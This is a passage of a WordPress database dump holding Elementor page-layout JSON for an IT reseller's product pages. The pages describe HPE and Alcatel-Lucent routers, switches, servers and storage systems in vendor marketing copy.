factor.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e505229\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"65af13d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Alcatel-Lucent 7750 Service Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2521\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Alcatel-Lucent-7750-Service-Router-Series.png\\\" alt=\\\"\\\" width=\\\"229\\\" height=\\\"171\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The Alcatel-Lucent 7750 Service Router (SR) is a high-performance, multiservice, edge router designed for the concurrent support of advanced end user, business and mobile services on a common IP edge platform. Leveraging the Alcatel-Lucent in-house 400 Gb\\/s FP3 silicon technology, the 7750 SR enables a wide range of IP services for large enterprises and operators with exceptional performance, scale and service intelligence requirements. The 7750 SR utilizes the Alcatel-Lucent Service Router Operating System (SR OS) and supports service-aware management to enhance operational efficiency.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f17738e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"6eb923f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE FlexNetwork MSR93x Router Series<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2522\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-FlexNetwork-MSR93x-Router-Series.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"188\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE MSR93x Router Series delivers a high-performance small-branch router providing integrated routing, switching, security, SIP, 802.11n WLAN connectivity, and 4G LTE\\/3G in a single unit. With its Converged Infrastructure, it enables faster time to service and enhanced performance while simplifying your network through a single management screen and zero-touch deployment. The MSR93x increases flexibility and agility, delivering extensive connectivity capabilities in a compact, fixed form factor. The MSR93x is based on open standards for seamless integration within small-branch deployment.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4335c67\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"964afb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f168dc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"479f0a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4f95a1f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3f5f006\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fed6471\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4419ab2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"145a6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5715260\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aeec70b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50f2e58\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"99ae68c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Switches<\\/strong><\\/h2>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"823bc65\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f135ea8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f3e7bd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"165\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2d0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"9dd34f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"244\\\" height=\\\"184\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5490442\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fae7b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4c6953\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7341cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af59a7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">To discover more, please click the button below or contact us to discuss your needs.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8623,3657,'_wc_apply_product',''),(8624,3657,'_yoast_wpseo_content_score','30'),(8423,3636,'_wp_page_template','template-fullwidth.php'),(8424,3636,'_elementor_edit_mode','builder'),(8425,3636,'_elementor_template_type','post'),(8426,3636,'_elementor_version','2.5.14'),(8427,3636,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23469e8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7ff144f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"b99977c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6146b0a\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"6698963\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"5ba2b0b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"75d2a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"eb529d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"54d4bd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2796cf3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"235\\\" height=\\\"160\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cf4a7d2\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"34c9825\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c6c2e78\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"611dff3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"bbf6243\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"65d7d46\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f5ccf11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4d891af\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0ea549c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"136e88a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7ecc5e6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"3e56afe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75d320e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML110 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"73a0f3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"20063ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"185\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c3f725\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7af140c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1963cc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"528c188\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3d82f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02284db\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"209c77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"465decc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9df2da5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745e40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d0111a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>HPE Synergy<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Composable, software-defined infrastructure that speeds application delivery.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e25b4f6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e344f90\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"e99ae7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy 12000 Frame<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"62e0e2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"40915d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"70339e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a96ca1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c8c89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da0887c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c273b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"296570e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d7056bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"34066b9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f501a1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bb27a6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2cf5757\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Data Storage<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"efbecc6\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"243cf87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"c45d541\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to 